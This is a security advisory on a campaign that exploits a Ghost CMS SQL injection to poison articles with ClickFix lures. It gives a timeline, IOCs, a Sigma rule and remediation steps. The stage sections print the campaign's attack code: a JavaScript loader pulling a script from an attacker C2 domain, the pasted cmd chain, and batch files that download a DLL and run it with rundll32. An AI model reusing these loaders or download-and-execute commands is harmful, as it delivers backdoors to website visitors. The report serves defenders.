
Ghost CMS CVE-2026-26980: SQL Injection Exploited in Large-Scale ClickFix Campaign



Table of Contents

  1. Executive Summary
  2. Campaign Timeline
  3. Vulnerability Background: CVE-2026-26980
  4. Attack Chain: Five-Stage Breakdown
    • Stage 1: CMS Takeover via SQL Injection
    • Stage 2: Article Poisoning with Two-Stage JS Loader
    • Stage 3: Cloaking & Traffic Filtering
    • Stage 4: ClickFix Social Engineering
    • Stage 5: Malware Delivery & Persistence
  5. Second Threat Cluster
  6. Scope of Impact
  7. MITRE ATT&CK Mapping
  8. IOC Reference
  9. Detection Methods
  10. Expert Assessment
  11. Remediation Recommendations
  12. References

Executive Summary

CVE-2026-26980 — a CVSS 9.4 SQL injection flaw in Ghost CMS — has been weaponized in an active, large-scale campaign that has compromised over 700 websites as of late May 2026. The flaw requires no authentication and allows attackers to extract Admin API keys directly from the database. Once a key is obtained, adversaries use the Ghost Admin API to silently inject malicious JavaScript into every published article on the target site.

Visitors landing on these poisoned pages — including properties belonging to Harvard University, Oxford University, and DuckDuckGo — are served a fake Cloudflare human-verification prompt that instructs them to paste and execute a Base64-encoded command. This triggers a ClickFix-style attack that delivers a persistent backdoor to Windows machines.

A patch has been available since February 19, 2026 (Ghost v6.19.1). The first observed poisoning (May 7) came 77 days after the fix shipped, and public disclosure (May 25) roughly 95 days after it. This is a patch-management failure, not a zero-day scenario: every site in the campaign was running a version with a known, fixed, critical flaw.

Most urgent action: Any organization running Ghost v3.24.0–6.19.0 must upgrade immediately, rotate all API keys, and audit article content for injected script tags.


Campaign Timeline

Date         Event
2026-02-16   Compilation timestamp of installer.dll; taken at face value, attacker tooling was staged before the patch (PE timestamps are attacker-controlled and can be backdated, so this is indicative rather than proof)
2026-02-19   Ghost CMS releases v6.19.1 patching CVE-2026-26980
2026-02-27   SentinelOne publishes exploitation details and detection guidance
2026-05-07   XLab detects first poisoning incident on a client's Ghost site; campaign investigation begins
2026-05-08   Attacker updates update.bat and changes the download chain
2026-05-10   First enumeration round: 156 victim domains confirmed; XLab begins notifying victims
2026-05-16   Attacker moves the cloaking domain from clo4shara[.]xyz to com-apps[.]cc; new installer.dll with zero VirusTotal detections deployed
2026-05-17   Second enumeration: 700+ domains confirmed; second threat cluster identified targeting the same victims
2026-05-18   NotepadPlusPlus.zip updated from a .cmd to a .js dropper
2026-05-25   Public disclosure by BleepingComputer and The Hacker News

Vulnerability Background: CVE-2026-26980

Ghost CMS exposes two categories of API keys:

  • Content API Key — read-only, intended for frontend content rendering
  • Admin API Key — full management access to articles, users, themes, and site configuration

CVE-2026-26980 is an unauthenticated SQL injection reachable through the Content API, the endpoint every Ghost site exposes to its own front end. User-supplied input reaches a SQL query without proper parameterization, so a crafted HTTP request can read arbitrary database contents, including the table that holds Admin API key secrets.

Once that key is in the attacker's hands, no further exploitation is needed. The Ghost Admin API provides legitimate, documented methods (PUT /ghost/api/admin/posts/:id/) to modify any article on the site, and the key does not expire: the short-lived tokens minted from it do, but the key itself stays valid until the integration it belongs to is deleted or regenerated. The attacker has, in effect, been handed the keys by the database itself.

Affected versions: Ghost 3.24.0 through 6.19.0
Fixed version: Ghost 6.19.1 (released February 19, 2026)
CVSS Score: 9.4 (Critical)
Discovered by: Anthropic using Claude (AI-assisted vulnerability research)


Attack Chain: Five-Stage Breakdown

XLab's research describes a highly automated pipeline: bulk vulnerability scanner → automatic key extraction → bulk article injection → dynamic C2 payload distribution. The entire chain can execute against a target in under 24 hours.

Stage 1: CMS Takeover via SQL Injection

The attacker sends a crafted request to Ghost's Content API endpoint, exploiting CVE-2026-26980 to read the database. The Admin API Key is extracted directly — no brute force, no credential phishing, no prior access required.

With the Admin API Key, the attacker can call any administrative endpoint, including bulk modification of all published articles.

Stage 2: Article Poisoning with Two-Stage JS Loader

Using the stolen Admin API Key, the attacker iterates through all articles via PUT /ghost/api/admin/posts/:id/ and appends a small JavaScript snippet to the bottom of each post.

Two loader variants have been observed. Both do the same job; the newer one first checks a localStorage flag so that the downstream payload is fetched only once per browser (localStorage persists across sessions, unlike sessionStorage), which cuts repeat callbacks to the C2 and the noise they generate. The ghost_once_footer_ string listed under IOCs is the marker this actor's injection leaves in the article HTML.

Core loader behavior:

// Simplified representation of the injected loader
var a = window.location,
    b = document.body,
    c = document.createElement("script");

// C2 URL hidden in Base64
// atob("aHR0cHM6Ly9jbG80c2hhcmEueHl6LzExejc3dTMucGhw")
// decodes to: https://clo4shara[.]xyz/11z77u3.php

c.src = atob("aHR0cHM6Ly9jbG80c2hhcmEueHl6LzExejc3dTMucGhw")
      + "?" + a.search.substring(1);

// btoa(a.origin) used as site fingerprint by C2
c.id = btoa(a.origin);

b.appendChild(c);

The two-stage architecture is deliberate. The loader embedded in the database is small and static. The actual payload is fetched on demand from the C2 server at runtime. This means:

  • The attacker can swap payloads without re-compromising each site
  • If the C2 is blocked, the attacker simply replaces the domain; infected sites automatically resume serving malicious content
  • The C2 can serve completely different payloads to different visitors based on geography, user agent, or time of day

Stage 3: Cloaking & Traffic Filtering

Requests to clo4shara[.]xyz/11z77u3.php (later com-apps[.]cc/11z77u3.php) are handled by a PHP cloaking script derived from the commercial service Adspect. The script collects detailed browser fingerprints before deciding what to return:

  • WebGL renderer / GPU model
  • Navigator properties (user agent, platform, language)
  • Timezone
  • Touch event support
  • Console tampering detection

Security crawlers and sandboxes see a benign placeholder page. Victims who pass the fingerprint check receive the active payload through one of 19 supported command types, including iframe, redirect, and js execution. In practice, victims are served an iframe instruction pointing to cloud-verification[.]com.

Stage 4: ClickFix Social Engineering

The iframe loads a convincing fake Cloudflare "Verify you are human" page. The deception works on two levels simultaneously.

First, in the background, a setTimeout scheduled at least 500 milliseconds after page load silently fetches update.zip from the attacker's infrastructure. Because the download is triggered by script rather than by a click, the only sign on most browser configurations is a transient download indicator, and the page's instructions have already primed the victim to ignore it.

Second, the fake CAPTCHA instructs the visitor to complete three "verification" steps:

  1. Press WIN+R to open the Run dialog
  2. Press CTRL+V to paste a command (which was written to the clipboard by the page's JavaScript)
  3. Press Enter

The pasted command, decoded from Base64, reads:

cmd /c "move %USERPROFILE%\Downloads\update.zip %TEMP%\u.zip
&& tar -xf %TEMP%\u.zip -C %TEMP%
&& start /min "" %TEMP%\update.bat"
& REM * I am not a robot reCAPTCHA Verification ID:2771

The REM comment disguised as a reCAPTCHA ID is an intentional psychological anchor: it reinforces the victim's belief that they are completing a legitimate verification, and since the Run dialog hands the whole line to cmd.exe it is parsed as a comment and never executes. The start /min switch runs update.bat in a minimized window. Note that tar.exe (bsdtar) has shipped with Windows 10 since version 1803, so the chain needs no tooling beyond what is already on the victim machine.

Stage 5: Malware Delivery & Persistence

The update.bat content evolved across the campaign's active window. In each version the core logic is identical: download a DLL from an external host, execute it via rundll32.exe, and open a distraction page to occupy the user's attention. In the scripts below, -W 1 is PowerShell's -WindowStyle Hidden, iwr is the Invoke-WebRequest alias, and rundll32 is told to call the DLL export named Begin.

May 7 variant:

@echo off
powershell -W 1 -C "$f=$env:Temp+'\installer.dll'; iwr 'https://link.storjshare[.]io/.../installer.dll' -OutFile $f; Start-Process rundll32 -ArgumentList $f,'Begin' -Window Hidden"
start "" "https://youtube.com"

May 16 variant (updated):

@echo off
powershell -W 1 -C "$f=$env:Temp+'\publl.dll'; iwr 'https://t[.]ly/docreport09052026.pdf' -OutFile $f; Start-Process rundll32 -ArgumentList $f,'Begin' -Window Hidden"
start "" "https://bc[.]ax/Supp.html"
exit

The final-stage payload, UtilifySetup.exe (MD5: 18a7251ddde77ed24bc54700d84d9be1), is an Inno Setup installer that extracts to the SuperMaxionQuickMaxlite directory under the user's AppData\Local (%LOCALAPPDATA%). It is a trojanized version of the open-source Grape Electron desktop client. The attacker replaced the original index.js entry point with a malicious one that:

  • Achieves persistence via Electron's setLoginItemSettings API (runs at user login)
  • Polls web-telegram[.]ug every 30 seconds via POST request
  • Executes arbitrary JavaScript code or binary files as instructed by the C2

The first-stage installer.dll (May 7–9 variant) dropped a signed PuTTY binary that performed no malicious behavior. XLab assessed this as a feasibility test — verifying the delivery chain's conversion rate before deploying the full backdoor.


Second Threat Cluster

During the May 17 enumeration, XLab identified a distinct second group operating against the same pool of compromised Ghost sites. This group uses a different injection fingerprint (sj.ssc/ipa/ versus the first group's ghost_once_footer_) and a separate C2 infrastructure pattern (/api/css.js URIs resolving to 144.31.236.66).

The Harvard International Review serves as a case study in concurrent compromise. On May 16, the site carried the first group's updated com-apps[.]cc loader. By May 17, the second group had replaced that with its own script. Within a single day, one of the world's most recognizable academic publications was being used as a staging ground in a turf dispute between two criminal actors.

Separately, a public report from April 23 documented this second group's script at script-dev[.]digital on the Harvard International Review — suggesting the second group had independent access to that target via a different initial vector, possibly predating this specific campaign. Some IOCs from this cluster have been linked to the Aeternum threat actor in prior research.


Scope of Impact

XLab confirmed over 700 poisoned domains as of May 17. The distribution by sector is as follows (based on AI-assisted classification):

Sector                              Count   Percentage
Personal Blog / Independent Site      368        48.1%
Software Dev / SaaS / Tech Blog       113        14.8%
Other / Unclassified                   97        12.7%
AI / Machine Learning                  35         4.6%
Web3 / Cryptocurrency                  22         2.9%
Education / Academia                   21         2.7%
Media / News / Publishing              19         2.5%
Security / Cybersecurity               11         1.4%

The percentages imply a base of roughly 765 classified domains; the rows above are the largest sectors and do not sum to that total.

Named high-profile victims include the Harvard International Review, Oxford University domains, Auburn University, and DuckDuckGo. XLab noted that the majority of victim notifications sent from May 10 onward received no response.


MITRE ATT&CK Mapping

Phase             Technique                                                                                              ID
Initial Access    Exploit Public-Facing Application                                                                      T1190
Execution         Command and Scripting Interpreter: PowerShell                                                          T1059.001
Execution         Command and Scripting Interpreter: Windows Command Shell                                               T1059.003
Execution         User Execution: Malicious File                                                                         T1204.002
Persistence       Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (via Electron setLoginItemSettings)   T1547.001
Defense Evasion   Masquerading (PuTTY with valid code-signing cert; fake Notepad++)                                      T1036
Defense Evasion   Obfuscated Files or Information (Base64, XOR)                                                          T1027
Defense Evasion   Traffic Signaling / Cloaking (Adspect fingerprinting)                                                  T1205
C2                Application Layer Protocol: Web Protocols                                                              T1071.001
C2                Ingress Tool Transfer (Storj CDN, S3 buckets)                                                          T1105
Impact            Defacement: External Defacement (article poisoning)                                                    T1491.002

IOC Reference

Threat Actor A — Infrastructure

# C2 / Cloaking domains
clo4shara[.]xyz
com-apps[.]cc
platecrumbs[.]com
cloud-verification[.]com
web-telegram[.]ug
jalwat[.]com
taketwolabs[.]com

# Active URLs
https://clo4shara[.]xyz/11z77u3.php
https://com-apps[.]cc/11z77u3.php
https://platecrumbs[.]com/11z77u3.php
https://cloud-verification[.]com/update.zip
https://com-apps[.]cc/update.zip
https://com-apps[.]cc/NotepadPlusPlus.zip
https://jalwat[.]com/static/uploads/campaigns/6/update.zip
https://taketwolabs[.]com/wp-content/NotepadPlusPlus.dll

Threat Actor B — Infrastructure

# Domains
staticcloudflare[.]pro
script-dev[.]digital
script-dev[.]buzz
script-dev[.]xyz
updatesecurity[.]pro
updatefilescf[.]top
static-file[.]digital
download-file[.]today
updatefile-cf[.]dgital
updatefile-cf[.]top

# Active URLs
https://staticcloudflare[.]pro/api/css.js
https://script-dev[.]digital/api/css.js
https://cdnupdatenews[.]top/dl?fid=38

# Shared IP
144.31.236.66

Sample Hashes

# MD5
5659292833ec421da11ebde005d9c9a8  installer.dll (Stage 1, compiled 2026-02-16)
d30cc10d54ebc967c8538ff74f442eee  NotepadPlusPlus.dll (Stage 2)
18a7251ddde77ed24bc54700d84d9be1  UtilifySetup.exe (Final payload)
f280e12f51f996dae7fffc64a56ee527  SuperAppizeSetup.msi
ec5dfee13abf94e08d0f94e90b527db0  NotepadPlusPlus.js
fceca579efcef09eb507c6ca977ea281  css.js (Threat Actor B)

Article Injection Fingerprints

# Threat Actor A — string present in poisoned article HTML
"ghost_once_footer_"

# Threat Actor B
"sj.ssc/ipa/"    # "/api/css.js" written backwards; search for it as written

# Additional indicators (either actor)
atob( and appendChild appearing together in article body
btoa(a.origin)

Detection Methods

For Site Operators

1. Audit article content in the database directly, not only through the Ghost editor UI, which may render an injected snippet as an opaque HTML card or not show it at all. Ghost stores the rendered html alongside the editor document (the lexical column on current versions, mobiledoc on older ones), so run the same patterns against that column as well:

-- MySQL (Ghost's production database; the same query works on the SQLite development database)
SELECT id, title, html
FROM posts
WHERE html LIKE '%ghost_once_footer_%'
   OR html LIKE '%sj.ssc/ipa/%'
   OR (html LIKE '%atob(%' AND html LIKE '%appendChild%')
   OR html LIKE '%btoa(a.origin)%';

2. Review Ghost Admin API access logs for anomalous PUT /ghost/api/admin/posts/:id/ requests:

  • Requests from unfamiliar IP ranges
  • Bulk modifications within a short time window
  • Unusual or automated User-Agent strings

3. Inspect the Code Injection settings and active theme files for appended <script> tags.

4. Audit the integrations list (Settings → Integrations): every custom integration owns an Admin API key. Delete any integration you do not recognise and regenerate the keys of the ones you keep; a key that has not been used recently but still exists is still a valid credential.

For Endpoint Security (Users Who Visited Compromised Sites)

  • Check browser download history for files from jalwat[.]com, cloud-verification[.]com, com-apps[.]cc, or taketwolabs[.]com
  • Check %TEMP% and %LOCALAPPDATA% for: installer.dll, publl.dll, NotepadPlusPlus.dll, UtilifySetup.exe, and the directory SuperMaxionQuickMaxlite
  • Check login startup items for the Electron application persistence entry
  • Look for outbound connections to web-telegram[.]ug (port 443, POST every ~30 seconds)

SIEM / NDR Detection Queries (Example Sigma)

title: Ghost CMS ClickFix - Run Dialog Command Execution Pattern
status: experimental
description: Detects cmd.exe spawned from explorer.exe (the Run dialog) with the move/tar/start chain used by the Ghost CMS ClickFix lure, or its "I am not a robot" REM marker
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith: '\explorer.exe'
    Image|endswith: '\cmd.exe'
  selection_chain:
    CommandLine|contains|all:
      - 'Downloads'
      - '.zip'
      - 'tar -xf'
      - '.bat'
  selection_marker:
    CommandLine|contains:
      - 'I am not a robot'
      - 'reCAPTCHA Verification ID'
  condition: selection_parent and (selection_chain or selection_marker)
falsepositives:
  - Users extracting archives from Downloads via the Run dialog (rare)
level: high

Two points about this rule. The cmd.exe launched from the Run dialog has explorer.exe as its parent and carries the full pasted line, so that is the process to match; its children (tar.exe, the cmd.exe that runs update.bat) see already-expanded paths and none of the markers above, which is why a rule keyed on cmd.exe as the parent would never fire. The %USERPROFILE% token is deliberately not required, since depending on how the Run dialog hands the line to cmd.exe it may appear expanded in the logged CommandLine.

Expert Assessment

On the vulnerability itself: A CVSS 9.4 is appropriate here, but what makes this particularly damaging is the blast radius per compromised site. A typical web application SQL injection might yield user records or session tokens. This one yields administrative control over a content publishing platform — the attacker gains the ability to put malicious content in front of every visitor, not just read data. The Admin API key is essentially equivalent to an authenticated shell for content operations.

On the 95-day exploitation window: The February-to-May gap follows a well-documented pattern in open-source CMS security. A critical unauthenticated flaw is disclosed, a patch ships, and attacker tooling appears six to twelve weeks later once the installed base has had time to not patch. The installer.dll used on May 7 carries a compile timestamp of February 16, three days before the patch was released. If that timestamp is genuine, at least one actor was tracking the disclosure and building tooling in parallel with the fix; PE timestamps are attacker-controlled and easily backdated, though, so it should be read as indicative rather than conclusive.

On ClickFix as an initial access technique: Recorded Future's Insikt Group projected in March 2026 that ClickFix would remain a dominant initial access method throughout the year specifically because it transfers the exploitation burden from automated systems to human behavior. The technique sidesteps exploit-oriented controls: there is no browser vulnerability, no macro and no mailed attachment for a filter to strip, because a human pastes and executes the command. Endpoint telemetry is not blind to it, however. The Run dialog produces a cmd.exe child of explorer.exe with the full command line, which is exactly what the Sigma rule above keys on. When the lure is embedded inside a page from a university or a well-known privacy-focused search engine, the psychological resistance to compliance drops considerably.

On the two competing threat clusters: The Harvard International Review being re-compromised by a second actor within 24 hours of the first actor's implant is not a coincidence — it reflects a pattern we see with opportunistic mass exploitation. Once a site appears in an active target list (whether from a public scanner or shared within a threat actor community), it attracts multiple parties. The site that cleans up Threat Actor A's script without patching the underlying vulnerability will be back on the same list within days. Ghost admins who cleaned their articles without upgrading to 6.19.1 are not remediated; they have simply reset the clock.

Regional relevance: Organizations in Southeast Asia running Ghost for technical blogs, company news sites, or developer documentation are in scope. The campaign shows no geographic filtering; any unpatched Ghost instance reachable from the internet is a valid target. The secondary risk is credential reuse: anything readable through the SQL injection (Admin and Content API keys, user password hashes, and whatever integration or mail settings the database holds) may be tested against other systems in the same infrastructure.


Remediation Recommendations

Immediate (0–24 Hours)

1. Patch: Upgrade Ghost CMS to the latest version (≥ 6.19.1). Self-hosted installs upgrade with Ghost-CLI (`ghost update`); the admin dashboard shows an update notice but does not perform the upgrade itself. Ghost(Pro) customers are patched by the vendor.

2. Rotate all credentials:

- Admin API Keys (all of them, not just the one you think was compromised)
- Content API Keys
- Administrator account passwords
- Session tokens (log out all active sessions)

3. Audit article content at the database level:

# SQLite is Ghost's development default; production installs use MySQL, where the same query applies:
sqlite3 /path/to/ghost.db "SELECT id, title FROM posts WHERE html LIKE '%atob(%' AND html LIKE '%appendChild%';"

# Remove injected scripts at the database level, not just in the editor, and re-run the query until it returns nothing

4. Block IOC domains at perimeter / DNS:

clo4shara[.]xyz
com-apps[.]cc
cloud-verification[.]com
web-telegram[.]ug
staticcloudflare[.]pro
script-dev[.]digital
(see full IOC list above)

Short-Term (1–7 Days)

5. Notify affected users. Any visitor to the site during the contamination window who uses Windows should be advised to run a full malware scan. Specifically check for the SuperMaxionQuickMaxlite directory and outbound connections to web-telegram[.]ug.

6. Audit Admin API access logs for the 30-day window prior to discovery. Retain logs for forensic purposes.

7. Review Ghost theme files and Code Injection configuration for any additional <script> tags not placed there by your team.

8. Conduct a broader credential audit. The Ghost Admin API key may not be the only sensitive credential stored in the database. Review what else was accessible via the SQL injection and assess exposure.

Long-Term

9. Implement a patch management process with mandatory SLA for critical vulnerabilities. A 95-day window between patch availability and application is not acceptable for a public-facing CMS. Critical CVEs should be patched within 72 hours.

10. Enable Ghost's automatic update notifications and configure monitoring for new CVE disclosures against your tech stack.

11. Monitor what the site serves, not only what the server fetches. The second-stage script is requested by the visitor's browser, so egress monitoring on the CMS host will never see clo4shara[.]xyz or com-apps[.]cc. Run synthetic checks that fetch your own published pages and alert on any script source outside an allowlist, and consider a Content-Security-Policy with a script-src allowlist: a policy without 'unsafe-inline' would have stopped the inline loader, but many Ghost themes and analytics snippets rely on inline scripts, so roll it out in report-only mode first.

12. Consider WAF rules for Ghost Admin API endpoints. Rate-limiting and geo-restriction on PUT /ghost/api/admin/posts/ can significantly reduce the blast radius of a future key compromise.


References

FPT IS Security